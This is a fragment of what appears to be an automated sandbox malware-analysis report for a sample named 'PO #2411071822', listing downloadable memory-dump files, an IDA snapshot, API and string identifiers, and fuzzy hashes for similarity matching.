                                                                                                              • Associated: 00000000.00000002.2062478813.000000000046D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062478813.000000000048E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062618100.000000000049A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2062653537.00000000004A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_3e0000_PO #2411071822.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindMessagePostSleepWindow
                                                                                                              • String ID: Shell_TrayWnd
                                                                                                              • API String ID: 529655941-2988720461
                                                                                                              • Opcode ID: b669a44da2347a1d09be4b6d0aa1b5b8022e040d2d6e404305c7001e3515cec6
                                                                                                              • Instruction ID: 18e1b1612d9c92a89daa60bed84c400efde1565ac25ac777d9e93092a021ca2d
                                                                                                              • Opcode Fuzzy Hash: b669a44da2347a1d09be4b6d0aa1b5b8022e040d2d6e404305c7001e3515cec6
                                                                                                              • Instruction Fuzzy Hash: CAD0C975B84324B7E6646770AC0BFC66A589B04B21F11082AF64AAA1D0D9E4A9408659